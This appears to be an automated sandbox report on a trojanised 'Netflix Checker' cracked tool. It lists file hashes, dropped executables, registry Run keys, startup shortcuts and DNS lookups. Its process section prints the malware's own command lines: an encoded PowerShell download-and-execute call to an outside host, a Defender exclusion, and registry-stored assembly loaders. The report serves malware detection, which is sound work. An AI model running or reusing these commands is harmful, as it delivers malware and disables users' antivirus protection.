memory/1228-137-0x0000000005130000-0x000000000513A000-memory.dmp
memory/1228-138-0x0000000005420000-0x0000000005476000-memory.dmp
memory/1228-139-0x00000000050F0000-0x0000000005100000-memory.dmp
memory/4288-140-0x0000000000EB0000-0x0000000000EC4000-memory.dmp
memory/4288-141-0x0000000006E10000-0x0000000006E8E000-memory.dmp
memory/4288-142-0x0000000005770000-0x0000000005780000-memory.dmp
memory/4288-143-0x0000000005770000-0x0000000005780000-memory.dmp
memory/804-145-0x0000000000470000-0x0000000000AAC000-memory.dmp
memory/804-146-0x0000000005250000-0x0000000005270000-memory.dmp
memory/804-147-0x00000000056D0000-0x0000000005724000-memory.dmp
memory/804-148-0x00000000067C0000-0x0000000006CEC000-memory.dmp
memory/2572-149-0x00000000024D0000-0x0000000002506000-memory.dmp
memory/2572-150-0x0000000004F80000-0x00000000055A8000-memory.dmp
memory/2572-151-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2572-152-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2572-153-0x0000000005670000-0x0000000005692000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3rhcjsff.k20.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2572-159-0x0000000005730000-0x0000000005796000-memory.dmp
memory/2572-164-0x0000000005910000-0x0000000005976000-memory.dmp
memory/2572-165-0x0000000005E10000-0x0000000005E2E000-memory.dmp
memory/804-166-0x0000000005CC0000-0x0000000005CD0000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4288-188-0x00000000069F0000-0x0000000006A66000-memory.dmp
memory/4288-189-0x00000000069D0000-0x00000000069EE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3212-204-0x00000000004F0000-0x0000000000502000-memory.dmp
memory/2572-206-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3212-205-0x0000000004D70000-0x0000000004D80000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/2572-208-0x00000000063D0000-0x0000000006402000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/2572-209-0x000000006F360000-0x000000006F3AC000-memory.dmp
memory/4868-222-0x00000000002D0000-0x00000000002E2000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2572-220-0x00000000063B0000-0x00000000063CE000-memory.dmp
memory/2572-226-0x0000000007750000-0x0000000007DCA000-memory.dmp
memory/2572-227-0x0000000007110000-0x000000000712A000-memory.dmp
memory/2572-228-0x0000000007180000-0x000000000718A000-memory.dmp
memory/2572-229-0x000000007FBD0000-0x000000007FBE0000-memory.dmp
memory/4868-230-0x0000000004A60000-0x0000000004A70000-memory.dmp
memory/2572-231-0x0000000007390000-0x0000000007426000-memory.dmp
memory/2572-232-0x0000000007340000-0x000000000734E000-memory.dmp
memory/2572-233-0x0000000007450000-0x000000000746A000-memory.dmp
memory/2572-234-0x0000000007430000-0x0000000007438000-memory.dmp
memory/804-237-0x0000000005CC0000-0x0000000005CD0000-memory.dmp
memory/3212-238-0x0000000004D70000-0x0000000004D80000-memory.dmp
memory/4868-239-0x0000000004A60000-0x0000000004A70000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
17s
Max time network
37s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Checker Netflix.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.150.43.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.121.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.top4top.net | udp |
| FR | 195.154.118.206:443 | 6.top4top.net | tcp |
| US | 8.8.8.8:53 | 6.top4top.io | udp |
| FR | 195.154.118.206:443 | 6.top4top.io | tcp |
| US | 8.8.8.8:53 | 206.118.154.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | papa.hopto.org | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
Files
memory/4660-133-0x0000000000980000-0x00000000009B4000-memory.dmp
memory/4660-134-0x0000000005350000-0x00000000053EC000-memory.dmp
memory/4660-135-0x00000000059A0000-0x0000000005F44000-memory.dmp
memory/4660-136-0x0000000005490000-0x0000000005522000-memory.dmp
memory/4660-137-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/4660-138-0x0000000005410000-0x000000000541A000-memory.dmp
memory/4660-139-0x0000000005660000-0x00000000056B6000-memory.dmp
memory/4588-140-0x0000000000980000-0x0000000000994000-memory.dmp
memory/4588-141-0x0000000002C20000-0x0000000002C30000-memory.dmp
memory/4588-142-0x0000000006900000-0x000000000697E000-memory.dmp
memory/4588-143-0x0000000002C20000-0x0000000002C30000-memory.dmp
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
memory/2232-159-0x0000000000CF0000-0x0000000000E70000-memory.dmp
C:\Users\Admin\AppData\Roaming\l1l1l.vbs
| MD5 | c78f607c916f060d6ee3bf391e303acc |
| SHA1 | 1575998cda060d4a570ba258abc12044601da283 |
| SHA256 | f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4 |
| SHA512 | cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b |
C:\Users\Admin\AppData\Roaming\powershell.js
| MD5 | 40b65baa1541784dd92f5aa8ae11b0ef |
| SHA1 | 0772c95f56a025704c01389f2d1108a17fb987cf |
| SHA256 | 9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699 |
| SHA512 | fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2 |
memory/3688-168-0x00000000049D0000-0x0000000004A06000-memory.dmp
C:\Users\Admin\AppData\Roaming\r1r1.vbs
| MD5 | 0494f414da149631c3d59861865dad37 |
| SHA1 | c9fd335759efb52e58acb974af27cdecb35d0f10 |
| SHA256 | a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56 |
| SHA512 | a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333 |
memory/2232-171-0x0000000005750000-0x0000000005760000-memory.dmp
memory/3688-170-0x0000000005110000-0x0000000005738000-memory.dmp
memory/3688-172-0x0000000004AD0000-0x0000000004AE0000-memory.dmp
memory/3688-173-0x0000000004AD0000-0x0000000004AE0000-memory.dmp
memory/3688-174-0x00000000050C0000-0x00000000050E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zy3aaw0l.z4p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3688-185-0x0000000005A90000-0x0000000005AF6000-memory.dmp
memory/3688-184-0x00000000059B0000-0x0000000005A16000-memory.dmp
memory/3688-189-0x0000000005F70000-0x0000000005F8E000-memory.dmp
memory/3776-190-0x0000000002A60000-0x0000000002A70000-memory.dmp
memory/3776-188-0x0000000002A60000-0x0000000002A70000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/4588-221-0x00000000065C0000-0x0000000006636000-memory.dmp
memory/4588-222-0x00000000065A0000-0x00000000065BE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2992-241-0x0000000000E40000-0x0000000000E52000-memory.dmp
memory/2232-242-0x0000000005750000-0x0000000005760000-memory.dmp
memory/2992-243-0x0000000005760000-0x0000000005770000-memory.dmp
memory/2748-244-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2748-245-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3688-247-0x0000000004AD0000-0x0000000004AE0000-memory.dmp
memory/3172-246-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/3688-269-0x0000000006570000-0x00000000065A2000-memory.dmp
memory/3304-282-0x0000000000410000-0x0000000000422000-memory.dmp
memory/3688-281-0x00000000064E0000-0x00000000064FE000-memory.dmp
memory/3688-270-0x000000006FA80000-0x000000006FACC000-memory.dmp
memory/3688-285-0x00000000078D0000-0x0000000007F4A000-memory.dmp
memory/3688-286-0x0000000007290000-0x00000000072AA000-memory.dmp
memory/3776-288-0x0000000002A60000-0x0000000002A70000-memory.dmp
memory/3688-287-0x000000007F1D0000-0x000000007F1E0000-memory.dmp
memory/3304-289-0x0000000004DA0000-0x0000000004DB0000-memory.dmp
memory/3688-290-0x0000000007300000-0x000000000730A000-memory.dmp
memory/3688-291-0x0000000007510000-0x00000000075A6000-memory.dmp
memory/2748-292-0x00000000060C0000-0x0000000006104000-memory.dmp
memory/3688-293-0x00000000074C0000-0x00000000074CE000-memory.dmp
memory/3688-294-0x00000000075D0000-0x00000000075EA000-memory.dmp
memory/2748-295-0x0000000006E50000-0x0000000006E72000-memory.dmp
memory/3688-296-0x00000000075B0000-0x00000000075B8000-memory.dmp
memory/2748-297-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3172-298-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6195a91754effb4df74dbc72cdf4f7a6 |
| SHA1 | aba262f5726c6d77659fe0d3195e36a85046b427 |
| SHA256 | 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5 |
| SHA512 | ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 436e0125cec6495a2eeb8bcee6b5bcb2 |
| SHA1 | 1b81cb527835eaaede3a21a08e5637dcc7611989 |
| SHA256 | 4b195c6ce2764de220cb0fc34119c05f54de57597c88e6c9c41c19d396196d4a |
| SHA512 | c646553ee11bf6da3db44e49d39209cf28db9599f3a09126f1a660aba4a848bef574611497790ddf59fd2e58bef7d01eb5ad6b898b04ff18740ae451e5ac2707 |
memory/2232-304-0x0000000005750000-0x0000000005760000-memory.dmp
memory/2232-305-0x0000000005750000-0x0000000005760000-memory.dmp
memory/2992-306-0x0000000005760000-0x0000000005770000-memory.dmp
memory/2748-307-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2748-308-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3172-309-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
memory/3304-310-0x0000000004DA0000-0x0000000004DB0000-memory.dmp
memory/2748-311-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3172-312-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
28s
Max time network
33s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Checker Netflix.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
